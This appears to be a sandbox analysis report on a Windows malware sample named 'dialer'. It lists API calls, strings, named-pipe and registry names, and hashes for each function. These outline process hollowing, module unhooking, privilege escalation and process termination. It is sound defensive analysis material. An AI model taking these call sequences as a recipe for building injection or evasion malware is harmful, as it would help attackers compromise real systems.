SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF65A131C26
CreateNamedPipeW.KERNELBASE ref: 00007FF65A131C67

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
Instruction ID: bb48154b40bdbe8833062395d6a6230a7eaa38ea53faf43ef641ebfdc5356556
Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
Instruction Fuzzy Hash: 8D3171326146518ADB20CF24E48079E77A5FB48798F44422AEB8D97E98DF3CE148CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A131F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 00007FF65A131F5D
StrCatW.SHLWAPI ref: 00007FF65A131F6B
GetModuleHandleW.KERNEL32 ref: 00007FF65A131F74
GetCurrentProcess.KERNEL32 ref: 00007FF65A131F94
K32GetModuleInformation.KERNEL32 ref: 00007FF65A131FA8
CreateFileW.KERNELBASE ref: 00007FF65A131FD8
CreateFileMappingW.KERNELBASE ref: 00007FF65A132002
MapViewOfFile.KERNELBASE ref: 00007FF65A132025
lstrcmpi.KERNEL32 ref: 00007FF65A13207B
VirtualProtect.KERNELBASE ref: 00007FF65A1320AE
VirtualProtect.KERNELBASE ref: 00007FF65A1320DE
FindCloseChangeNotification.KERNELBASE ref: 00007FF65A1320E7
CloseHandle.KERNEL32 ref: 00007FF65A1320F0
FreeLibrary.KERNEL32 ref: 00007FF65A1320F9

Strings

.text, xrefs: 00007FF65A132074
C:\Windows\System32\, xrefs: 00007FF65A131F4F

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: File$CloseCreateHandleModuleProtectVirtual$ChangeCurrentFindFreeInformationLibraryMappingNotificationProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 1125510917-832442975
Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
Instruction ID: f8cd9da32bd5f05234f074562d0aa887b23da38695083ed414fb1e39bfafe15b
Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
Instruction Fuzzy Hash: B451C336B0868192EF349F15E54466A7361FF84B95F484132DE8E57B54EF3CE548C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A132BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF65A131B54: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF65A131BA3
Part of subcall function 00007FF65A131B54: SetEntriesInAclW.ADVAPI32 ref: 00007FF65A131BEB
Part of subcall function 00007FF65A131B54: LocalAlloc.KERNEL32 ref: 00007FF65A131BFB
Part of subcall function 00007FF65A131B54: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF65A131C0F
Part of subcall function 00007FF65A131B54: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF65A131C26
Part of subcall function 00007FF65A131B54: CreateNamedPipeW.KERNELBASE ref: 00007FF65A131C67

Sleep.KERNEL32 ref: 00007FF65A132C1D
ConnectNamedPipe.KERNELBASE ref: 00007FF65A132C2A
ReadFile.KERNEL32 ref: 00007FF65A132C4D
WriteFile.KERNEL32 ref: 00007FF65A132C7B
Sleep.KERNEL32 ref: 00007FF65A132C88
DisconnectNamedPipe.KERNEL32 ref: 00007FF65A132C91

Strings

\\.\pipe\dialerchildproc64, xrefs: 00007FF65A132C05
M, xrefs: 00007FF65A132C6E

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\dialerchildproc64
API String ID: 2203880229-3489460547
Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
Instruction ID: 447e374bf33203f5281a7212a16cf8832de539076e66116ba4f85b83ac7b5dc8
Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
Instruction Fuzzy Hash: 29117021A0C64292EF24EF25E8043796760AF957E1F084276D6DE966D4CF7CE408C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A1321D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF65A131B54: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF65A131BA3
Part of subcall function 00007FF65A131B54: SetEntriesInAclW.ADVAPI32 ref: 00007FF65A131BEB
Part of subcall function 00007FF65A131B54: LocalAlloc.KERNEL32 ref: 00007FF65A131BFB
Part of subcall function 00007FF65A131B54: InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF65A131C0F
Part of subcall function 00007FF65A131B54: SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF65A131C26
Part of subcall function 00007FF65A131B54: CreateNamedPipeW.KERNELBASE ref: 00007FF65A131C67

Sleep.KERNEL32 ref: 00007FF65A1321F5
ConnectNamedPipe.KERNELBASE ref: 00007FF65A132202
ReadFile.KERNEL32 ref: 00007FF65A132225
Sleep.KERNEL32 ref: 00007FF65A132246
DisconnectNamedPipe.KERNEL32 ref: 00007FF65A13224F

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF65A1321DD

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 2071455217-3440882674
Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
Instruction ID: b60da6f928a2f9ea42751551bd2827a42f3973b35534fdf994f56ead77422801
Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
Instruction Fuzzy Hash: DB017921A0C54291EE34AF15E8042757374AF61BA1F1C8276DBAEA65E4DF7CE448C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A132B38 Relevance: 9.1, APIs: 6, Instructions: 58
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF65A132B53
HeapAlloc.KERNEL32 ref: 00007FF65A132B67
GetProcessHeap.KERNEL32 ref: 00007FF65A132B70
HeapAlloc.KERNEL32 ref: 00007FF65A132B7E
K32EnumProcesses.KERNEL32 ref: 00007FF65A132B99
Sleep.KERNEL32 ref: 00007FF65A132BEE

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
Instruction ID: 413531b650a79ca1bf75a05039c52b97eb5dc5d7bd2ba00861542d1d8aab0c81
Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
Instruction Fuzzy Hash: 5911A232B086528AEB38DF16E85443A7661FFD4F81F184079DA8A5BB58CF3DE845CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A1317EC Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,00000000,?,00007FF65A13238B,?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A131801
RtlAllocateHeap.NTDLL(?,00000000,?,00007FF65A13238B,?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A131812

Part of subcall function 00007FF65A1314D8: GetProcessHeap.KERNEL32 ref: 00007FF65A13150B
Part of subcall function 00007FF65A1314D8: HeapAlloc.KERNEL32 ref: 00007FF65A13151E
Part of subcall function 00007FF65A1314D8: GetProcessHeap.KERNEL32 ref: 00007FF65A13152C
Part of subcall function 00007FF65A1314D8: HeapAlloc.KERNEL32 ref: 00007FF65A13153D
Part of subcall function 00007FF65A1314D8: K32EnumProcesses.KERNEL32 ref: 00007FF65A131557
Part of subcall function 00007FF65A1314D8: OpenProcess.KERNEL32 ref: 00007FF65A131585
Part of subcall function 00007FF65A1314D8: K32EnumProcessModules.KERNEL32 ref: 00007FF65A1315AA
Part of subcall function 00007FF65A1314D8: ReadProcessMemory.KERNELBASE ref: 00007FF65A1315E1
Part of subcall function 00007FF65A1314D8: FindCloseChangeNotification.KERNELBASE ref: 00007FF65A13161D
Part of subcall function 00007FF65A1314D8: GetProcessHeap.KERNEL32 ref: 00007FF65A13162F
Part of subcall function 00007FF65A1314D8: HeapFree.KERNEL32 ref: 00007FF65A13163D
Part of subcall function 00007FF65A1314D8: GetProcessHeap.KERNEL32 ref: 00007FF65A131643
Part of subcall function 00007FF65A1314D8: HeapFree.KERNEL32 ref: 00007FF65A131651

OpenProcess.KERNEL32 ref: 00007FF65A131859
TerminateProcess.KERNEL32 ref: 00007FF65A13186C
CloseHandle.KERNEL32 ref: 00007FF65A131875
GetProcessHeap.KERNEL32 ref: 00007FF65A131885

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: HeapProcess$AllocCloseEnumFreeOpen$AllocateChangeFindHandleMemoryModulesNotificationProcessesReadTerminate
String ID:
API String ID: 3947494490-0
Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
Instruction ID: a91f9f5c5581a15ea8aadd44addc0dbaab50f5b7045d410087c7cd8c74499115
Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
Instruction Fuzzy Hash: E8116621F0965285FF289F1BE844079A7A1EF89B85F0C8076DE8DA3765DE7CD4458704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A1318AC Relevance: 4.5, APIs: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,00007FF65A13110E), ref: 00007FF65A1318CA
IsWow64Process.KERNEL32(?,?,?,00007FF65A13110E), ref: 00007FF65A1318E0
FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF65A13110E), ref: 00007FF65A1318FB

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: Process$ChangeCloseFindNotificationOpenWow64
String ID:
API String ID: 3805842350-0
Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
Instruction ID: 39f52291810d9891cec9aabda7e6a15e50b9da23fb78d7ee0040c2dbe231c701
Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
Instruction Fuzzy Hash: 83F01D21B0978292EF648F16B584129A6A1EF88BC1F48907AEB8D93758DF7DD4858704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A132258 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF65A13226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13228F
Part of subcall function 00007FF65A13226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13229F
Part of subcall function 00007FF65A13226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A1322B9
Part of subcall function 00007FF65A13226C: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF65A1322D0
Part of subcall function 00007FF65A13226C: AdjustTokenPrivileges.KERNELBASE ref: 00007FF65A132308
Part of subcall function 00007FF65A13226C: GetLastError.KERNEL32 ref: 00007FF65A132312
Part of subcall function 00007FF65A13226C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13231B
Part of subcall function 00007FF65A13226C: FindResourceA.KERNEL32 ref: 00007FF65A13232F
Part of subcall function 00007FF65A13226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A132346
Part of subcall function 00007FF65A13226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13235F
Part of subcall function 00007FF65A13226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A132371
Part of subcall function 00007FF65A13226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF65A132261), ref: 00007FF65A13237E
Part of subcall function 00007FF65A13226C: RegCreateKeyExW.KERNELBASE ref: 00007FF65A1323BE
Part of subcall function 00007FF65A13226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF65A1323E5
Part of subcall function 00007FF65A13226C: RegSetKeySecurity.KERNELBASE ref: 00007FF65A1323FE
Part of subcall function 00007FF65A13226C: LocalFree.KERNEL32 ref: 00007FF65A132408

ExitProcess.KERNEL32 ref: 00007FF65A132263

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: Process$Resource$Security$CurrentDescriptorFindOpenToken$AdjustChangeCloseConvertCreateErrorExitFreeLastLoadLocalLockLookupNotificationPrivilegePrivilegesSizeofStringValue
String ID:
API String ID: 2373407002-0
Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
Instruction ID: 19fb4629c89324b12cb95f9c2c49c3b2406850aea5ffa1e58bf05f9d7fd97e12
Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
Instruction Fuzzy Hash: C0A02200F0E00282FE383FF80C0E03C20A02FA0B02F0800B2C08AEA282CC3C20028308

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF65A132560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00007FF65A1325E7

Part of subcall function 00007FF65A1318AC: OpenProcess.KERNEL32(?,?,?,00007FF65A13110E), ref: 00007FF65A1318CA
Part of subcall function 00007FF65A1318AC: IsWow64Process.KERNEL32(?,?,?,00007FF65A13110E), ref: 00007FF65A1318E0
Part of subcall function 00007FF65A1318AC: FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF65A13110E), ref: 00007FF65A1318FB

Part of subcall function 00007FF65A1310C0: OpenProcess.KERNEL32 ref: 00007FF65A13112C
Part of subcall function 00007FF65A1310C0: OpenProcess.KERNEL32 ref: 00007FF65A13114B
Part of subcall function 00007FF65A1310C0: K32GetModuleFileNameExW.KERNEL32 ref: 00007FF65A131170
Part of subcall function 00007FF65A1310C0: PathFindFileNameW.SHLWAPI ref: 00007FF65A13117E
Part of subcall function 00007FF65A1310C0: lstrlenW.KERNEL32 ref: 00007FF65A13118A
Part of subcall function 00007FF65A1310C0: StrCpyW.SHLWAPI ref: 00007FF65A1311A1
Part of subcall function 00007FF65A1310C0: CloseHandle.KERNEL32 ref: 00007FF65A1311AD
Part of subcall function 00007FF65A1310C0: StrCmpIW.SHLWAPI ref: 00007FF65A1311E2
Part of subcall function 00007FF65A1310C0: NtQueryInformationProcess.NTDLL ref: 00007FF65A131216
Part of subcall function 00007FF65A1310C0: OpenProcessToken.ADVAPI32 ref: 00007FF65A131240

RegOpenKeyExW.ADVAPI32 ref: 00007FF65A132683
RegDeleteValueW.ADVAPI32 ref: 00007FF65A13269B
ExitProcess.KERNEL32 ref: 00007FF65A1326BF
GetProcessHeap.KERNEL32 ref: 00007FF65A1326C6
HeapAlloc.KERNEL32 ref: 00007FF65A1326D9
K32EnumProcesses.KERNEL32 ref: 00007FF65A1326F6
ExitProcess.KERNEL32 ref: 00007FF65A132796

Strings

SOFTWARE, xrefs: 00007FF65A132675
dialerstager, xrefs: 00007FF65A132694
open, xrefs: 00007FF65A132960

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: Process$Open$File$CloseExitFindHeapName$AllocChangeDeleteEnumHandleInformationModuleNotificationPathProcessesQueryReadTokenValueWow64lstrlen
String ID: SOFTWARE$dialerstager$open
API String ID: 4281403370-3931493855
Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
Instruction ID: ee5751e449e949ef954e9388f5643c784d9faea982b98059776b92cbbda03e77
Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
Instruction Fuzzy Hash: 0BD18721A085838BEF79AF2998042B93255FF54744F4C4177DACEABA94DF7CE604C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A131C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 00007FF65A131D1D
VirtualAllocEx.KERNEL32 ref: 00007FF65A131D4C
WriteProcessMemory.KERNEL32 ref: 00007FF65A131D73
WriteProcessMemory.KERNEL32 ref: 00007FF65A131DB2
VirtualAlloc.KERNEL32 ref: 00007FF65A131DE3
GetThreadContext.KERNEL32 ref: 00007FF65A131DFF
WriteProcessMemory.KERNEL32 ref: 00007FF65A131E26
SetThreadContext.KERNEL32 ref: 00007FF65A131E44
ResumeThread.KERNEL32 ref: 00007FF65A131E52
OpenProcess.KERNEL32 ref: 00007FF65A131E6A
TerminateProcess.KERNEL32 ref: 00007FF65A131E7D

Strings

@, xrefs: 00007FF65A131D44

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
String ID: @
API String ID: 3462610200-2766056989
Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
Instruction ID: 4e59e8d8f5326803537ecac9416ae43a3d7f7d4685ab73a0218b25ebf26b4ea2
Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
Instruction Fuzzy Hash: 05519B32B04A4186EF61CF66E8406AA7BE5FF48B88F094176CE8DA7758DF39E445C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A1319C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00007FF65A1319E6
SysAllocString.OLEAUT32 ref: 00007FF65A1319F6
CoInitializeEx.OLE32 ref: 00007FF65A131A03
CoInitializeSecurity.OLE32 ref: 00007FF65A131A3A
CoCreateInstance.OLE32 ref: 00007FF65A131A7A
VariantInit.OLEAUT32 ref: 00007FF65A131A8C
CoUninitialize.OLE32 ref: 00007FF65A131B26
SysFreeString.OLEAUT32 ref: 00007FF65A131B2F
SysFreeString.OLEAUT32 ref: 00007FF65A131B38

Strings

dialersvc64, xrefs: 00007FF65A1319DD

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: dialersvc64
API String ID: 4184240511-3881820561
Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
Instruction ID: 0fd03e714dc6d3f763d2ba92b44ea0c109d8a4664c022c3e9ba76a52764a67b4
Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
Instruction Fuzzy Hash: 37416332708A8296EB20CF69E4442AD73B5FF85B99F089176EE8D97A54DF3CE145C304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A131000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF65A131034
RegDeleteKeyW.ADVAPI32 ref: 00007FF65A131045
RegEnumKeyExW.ADVAPI32 ref: 00007FF65A131082
RegCloseKey.ADVAPI32 ref: 00007FF65A131093
RegDeleteKeyExW.ADVAPI32 ref: 00007FF65A1310B0

Strings

SOFTWARE\dialerconfig, xrefs: 00007FF65A131026, 00007FF65A13109C

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\dialerconfig
API String ID: 3013565938-461861421
Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
Instruction ID: 59817108e9c8c297ff7625c0d2203548c67d4b1c4bce412bffabd7c303b3d771
Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
Instruction Fuzzy Hash: 6A11CA36B18A8581EF708F24E8457F92364FF44754F444276D69D569D8DF3CD248CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A132A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF65A132ACB
WriteFile.KERNEL32 ref: 00007FF65A132AF3
WriteFile.KERNEL32 ref: 00007FF65A132B16
CloseHandle.KERNEL32 ref: 00007FF65A132B1F

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00007FF65A132AA8

Memory Dump Source

Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true

Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 148219782-3440882674
Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
Instruction ID: 7a33322279e97794134140e4f50075b821a72643ec45bb6dff8710541c8f83e9
Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
Instruction Fuzzy Hash: 0611AC36B24B5182EB208F05E908329A760FB88FA0F584236DAA957B98CF7CD509C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF65A131914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00007FF65A132138), ref: 00007FF65A131924
GetProcAddress.KERNEL32(?,?,00000000,00007FF65A132138), ref: 00007FF65A131937

Strings

ntdll.dll, xrefs: 00007FF65A13191A

Memory Dump Source

